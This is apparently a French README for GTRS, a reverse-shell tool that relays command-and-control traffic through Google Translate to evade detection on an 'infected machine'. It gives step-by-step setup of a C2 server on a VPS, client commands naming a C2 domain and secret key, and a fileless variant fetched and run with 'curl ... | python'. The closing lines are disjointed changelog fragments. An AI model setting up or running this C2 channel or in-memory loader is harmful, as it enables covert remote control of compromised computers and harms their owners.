
GTRS - Shell inversé Google Traduction
Cet outil utilise Google Translator comme proxy pour envoyer des commandes arbitraires à une machine infectée.
[MACHINE INFECTÉE] ==HTTPS==> [GOOGLE TRANSLATE] ==HTTP==> [C2]
Vous avez d'abord besoin d'un VPS et d'un domaine, pour le domaine vous pouvez en obtenir un gratuitement sur Freenom.
Lancez server.py sur votre VPS
python2.7 server.py
Server running on port: 80
Secret Key: e294a11e-bb6f-49ed-b03a-9ec42be55062
Il vous fournira une clé secrète qui sera utilisée sur le client.
Exécutez le client sur un ordinateur ayant accès à Google Translator, en fournissant le domaine et la clé secrète générée par le serveur.
bash client.sh www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
Vous avez maintenant un shell interactif utilisant des fichiers de tube nommé, OUI vous pouvez cd dans les répertoires.
Vous devez d'abord télécharger le binaire ou le compiler, puis le processus est identique à celui du client bash,
./client_Linux www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
Avec ce client, vous avez la possibilité de l'exécuter sur Linux, Mac et Windows, mais le client n'a pas encore de shell interactif.
Après avoir lu ce blogpost, j'ai fait une simple adaptation pour exécuter le GTRS en mémoire, modifiez simplement l'hôte et la clé dans le script inmemory-linux.py, puis hébergez-le sur un serveur et exécutez curl.
curl https://yourserver.ml/inmemory-linux.py | python
Ou vous pouvez héberger le script en utilisant l'approche youtube.
CODE_IS_CHEAP_SHOW_ME_THE_DEMO
.bashrc.Problème résolu en utilisant l'en-tête User-Agent pour envoyer des données.xmllint qui se trouve dans libxml2-utils.Problème résolu, maintenant le client est également écrit en Go.